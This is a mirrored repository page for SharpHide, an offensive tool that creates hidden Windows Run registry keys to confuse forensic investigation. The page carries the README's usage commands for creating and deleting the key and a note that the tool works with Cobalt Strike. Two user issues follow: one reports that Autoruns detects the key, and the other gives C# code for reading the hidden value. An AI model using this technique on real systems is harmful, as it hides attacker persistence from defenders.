Code Monkey home page Code Monkey logo

sharphide's Introduction

SharpHide

Just a nice persistence trick to confuse DFIR investigation. Uses NtSetValueKey native API to create a hidden (null terminated) registry key. This works by adding a null byte in front of the UNICODE_STRING key valuename.

More info about this technique can be found in the following whitepaper: https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf

The tool uses the following registry path in which it creates the hidden run key: (HKCU if user, else HKLM)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Usage

To Create hidden registry (Run) key:

SharpHide.exe action=create keyvalue="C:\Windows\Temp\Bla.exe"

To Create a hidden registry (Run) key with parameters:

SharpHide.exe action=create keyvalue="C:\Windows\Temp\Bla.exe" arguments="arg1 arg2"

Delete hidden registry (Run) key:

SharpHide.exe action=delete

This tool also works with Cobalt Strike's execute-assembly.

Credits

Author: Cornelis de Plaa (@Cneelis) / Outflank

sharphide's People

Contributors

cn33liz avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

gavz modulexcite attackgithub msf-ntdll jesusninoc decay88 raystyle arryboom hello-xbugs analyticsearch slyd0g topotam itzdan shantanu561993 burnnotice askyeye jack51706 johndoex1 jas879 chris-devine-research chouaibhm redops-hk beckcs usama7628674 alainw68 u53r55 bouckdarko deepwebhacker 3had0w bixingbin benyg thebarristersway pegasusx sec-js wivd philbertphotos bcp-infosec-repo rmusser01 02bx listinvest bigbrobro whoami2323 reanimat0r freeide kaplie v4nyl leomatias xiaoshzx benjiaminhanks2 lunarobliq sneak71 superuser5 nosorry mygit2014 jahawkins malicious-xv zhouzu prakash-rokade scriptidiot ludashuai001 mebuis wh014m fzkiritsugu digitalarche mikikatz kopfjager007 tomkallo crackercat bgrstar zday-x kaerez skyn9ne caustickirbyz ddwgege mmyyhack lay0us ljy-002 kjuliapoot axax002 dmitry13477 outs1d3r-net ttsite ezzalddeenali gnusec ognz apkc sec-tools-repo humanaoffsec ahmadfaurani offsoc

sharphide's Issues

Detected by AutoRuns on Windows 10

I compiled this with Visual Studio 2019 and then did

Inside powershell running as administrator.
.\SharpHide.exe action=create keyvalue="C:\Windows\System32\cmd.exe /c calc.exe"

I then ran autoruns64 as an administrator and saw it that the entry got detected.

OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.17763 N/A Build 17763

caught

How do you get the value?

I can try the valueNameTrick with or without the leading zeroes. Consistently returns:
ERROR_FILE_NOT_FOUND
2 (0x2)
The system cannot find the file specified.

`

    public static T GetHiddenKeyValue<T>(string registryPath, string valueName)
    {
        UIntPtr regKeyHandle = UIntPtr.Zero;
        string valueNameTrick = "\0\0" + valueName;

        bool IsSystem;
        using (var identity = System.Security.Principal.WindowsIdentity.GetCurrent())
        {
            IsSystem = identity.IsSystem;
        }

        registryPath = registryPath.RemoveStartIfMatches(@"HKEY_CURRENT_USER\");

        uint Status = 0xc0000000;
        uint STATUS_SUCCESS = 0x00000000;
        uint ERROR_MORE_DATA = 0xEA;

        Debug.WriteLine("\n[+] SharpHide running as normal user:\r\n    Using HKCU\\{0}", registryPath);
        Status = RegOpenKeyEx(HKEY_CURRENT_USER, registryPath, 0, KEY_QUERY_VALUE, out regKeyHandle);

        UNICODE_STRING ValueName = new UNICODE_STRING(valueNameTrick)
        {
            Length = (ushort)(2 * valueNameTrick.Length),
            MaximumLength = 0
        };

        IntPtr ValueNamePtr = StructureToPtr(ValueName);
        UNICODE_STRING ValueData;
        uint lpType = 0;
        IntPtr lpData = IntPtr.Zero;
        int lpcbData = 0;

        ValueData = new UNICODE_STRING();

        Status = RegQueryValueEx(regKeyHandle, ValueNamePtr, 0, out lpType, out lpData, ref lpcbData); 

        if (Status.Equals(ERROR_MORE_DATA))
        {
            lpData = Marshal.AllocCoTaskMem(lpcbData);
            Status = RegQueryValueEx(regKeyHandle, ValueNamePtr, 0, out lpType, out lpData, ref lpcbData);

            if (Status.Equals(STATUS_SUCCESS))
            {
                ValueData = PtrToStructure<UNICODE_STRING>(lpData);

                Debug.WriteLine("[+] Key value retrieved created.");

                Marshal.FreeCoTaskMem(lpData);

                if (typeof(T) == typeof(string))
                {
                    return (T)(object)ValueData.ToString();
                }
                else if (typeof(T) == typeof(byte[]))
                {
                    return (T)(object)ValueData.buffer;
                }
                else
                {
                    DebugUtils.Break();
                    return default(T);
                }
            }
        }
        else
        {
            Debug.WriteLine("[!] Failed to create registry key.");
        }

        RegCloseKey(regKeyHandle);
        return default(T);
    }

`

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.